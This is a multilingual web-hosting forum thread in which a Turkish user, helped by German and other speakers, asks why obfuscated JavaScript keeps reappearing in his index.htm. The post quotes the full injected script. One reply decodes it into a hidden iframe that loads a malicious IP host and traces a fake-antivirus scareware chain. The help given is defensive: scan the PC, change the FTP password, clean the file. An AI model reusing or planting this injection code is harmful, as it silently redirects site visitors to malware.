hello
I’am Ahmet
I’am Form Turkey

<script><!--var d=document,kol=561;function O10H4854729D00577(H4854729D00973){ var H4854729D00D70 = 16; return( parseInt(H4854729D00973,H4854729D00D70));}function H4854729D01967(H4854729D01D60){ var H4854729D02955 = 2; var H4854729D0215E='';for(H4854729D02559=0; H4854729D02559<H4854729D01D60.length; H4854729D02559+=H4854729D02955){ H4854729D0215E += ( String.fromCharCode (O10H4854729D00577(H4854729D01D60.substr(H4854729D02559, H4854729D02955))));}return H4854729D0215E;} document.write(H4854729D01967('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A31323333292B276538643631315C272077696474683D33206865696768743D343131207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));//--></script>

trojen to escape please

help me please

please write exactly what’s your problem

No engilis

yukarida verdiğim kod index.htm dosyasina giriyor.

Chmod 444 yaptigim halde bunu nasil önleyeblirim.

da oben ist kod index.htm ordner
da können sie reingehen.

haben wir jmd. der türkisch spricht hier an board?

can you try to say the problem on english? At moment can nobody speak turkish.

da oben ist kod index.htm ordner
da können sie reingehen

(ich spreche auch nicht türkisch)

Ihre seite is ifiziert mit ein javascript code und diese code probiert ein trojan installieren.
linked.drag2web.com/virus.jpg

Er bitten diese javascript code zu entfernen.

vielleich er kann das nicht oder ihre computer is infiziere es wann er hohlade die index.html… oder ein trojan hat ihre passwort geklaut…

DNA:
test dein computer mit antivirus program
dann ändern dein passwort in bplaced.net (neue passwort)

tu parle francais?

salam, senin ne problemin var? ben turkce cox iyi anlamiyorum amma sene kömek iliye biliyorum…
ve bacarmiyorsun sen deutsch?

kardes index lerime yukardaki kod giriyor virüs ziyaretcilerimi kaçiriyor ben bu kodu siliyorum
Chmod 444 yapiyorum dana sonra bakmiyorum kod yine girmis chmod 654 olmus bunu baska yere
sordugumda host firmasindan kaynaklaniyor dediler

non il ne parle pas
muahah

wer hat da meinen post gelöscht ey ?

er hat ein problem in seiner index seite und meint dass er den code löscht den verzeichnis auf 444 setzt und dann aufeinmal der code wieder da ist. kann man da was machen miro?

@DNA: ben mirodan sorushdum ki o codu ordan poza biler yoksa yox, bekle o senin index fajli pozar ve sen yeniden onu yükleyersen amma o codsuz.
EDIT:
Ola bilir sende computerinde o trojan yayilmish, ona göre komputeri virusa garshi yokla. bütün hamisi silinenden sonra ftpye gir ve onu birdaha poz

Ihre pc ist infiziert oder ihre ftp dataien (passwort) sind gestolen mit trojan…

wie in diesem fall: phi-gilde.de/thread.php?threadid=4992
wowszene.de/comment.php?comment.news.1557

oder diese: webtrh.cz/6435-utok-stranky-var- … 3bf18&

oder diese (drin in ftp log)
encse.freeblog.hu/archives/2008/ … vba_ejtfc/

So, erstmal DNAs computer testen, dann bplaced passwort ändern… und index.html korrigieren

thank you :((

No ingilizce :((

Türkis Help Show

Das tut jetzt zwar nichts zur Sache, aber ich hab ein bisschen analysiert, was dieser Code macht:

1.d.write('<IFRAME name=O1 src=\'http://77.221.133.171/.if/go.html?'+Math.round(Math.random()*1233)+'e8d611\' width=3 height=411 style=\'display: none\'></IFRAME >');das ergibt z.B. folgenden Code:<IFRAME name=O1 src='http://77.221.133.171/.if/go.html?1229e8d611' width=3 height=411 style='display: none'></IFRAME >

2.
Die Seite in den IFrame ist eine gefakte 403er Seite, die ein neuen IFrame öffnet.[code]

Forbidden

You don't have permission to access /.if/go.html on this server.

3.
Auf nolink://77.221.133.171/.dif/go.php?sid=1 bekommt man dann diese nette Meldung:[quote]ATTENTION! You have not completed the virus scan!
Your PC is still infected with spyware!

Please return to advancedxpdefender.com and download Advanced XP Defender scanner.[/quote]
Dann startet ein „Scan“, der bei mir gleich ein Paar infizierte .exe Dateien findet (ich nutze Linux )

4.
Zuletzt wird man genötigt sich ein Setup runterzuladen, um die (warscheinlich mit Magischen Kräften) ermittelten Viren zu entfernen. Das Setup ist mit not-virus:Hoax.Win32.Renos.czu verseucht

PS: Die Seite wird nach jedem neu laden in einem neuen Design angezeigt, die zugegeben nicht mal so schlecht aussehen.
PPS: Wenn jemand Zeit hat kann er die IP 77.221.133.171 an abuse@infobox.ru melden

hiç bir şey anlamadim )

Can you please try to speak English?

We don’t understand anything

Προσπαθώ φορές δεν γνωρίζουμε όλα τα δικαιώματα σε 777 καθορίσουν ή να ελέγξετε το FTP δεδομένα και αλλιώς …

Εάν αυτό δεν δουλέψει, δεν μπορώ να κάνουν οτιδήποτε και μόνο hamsacklam πω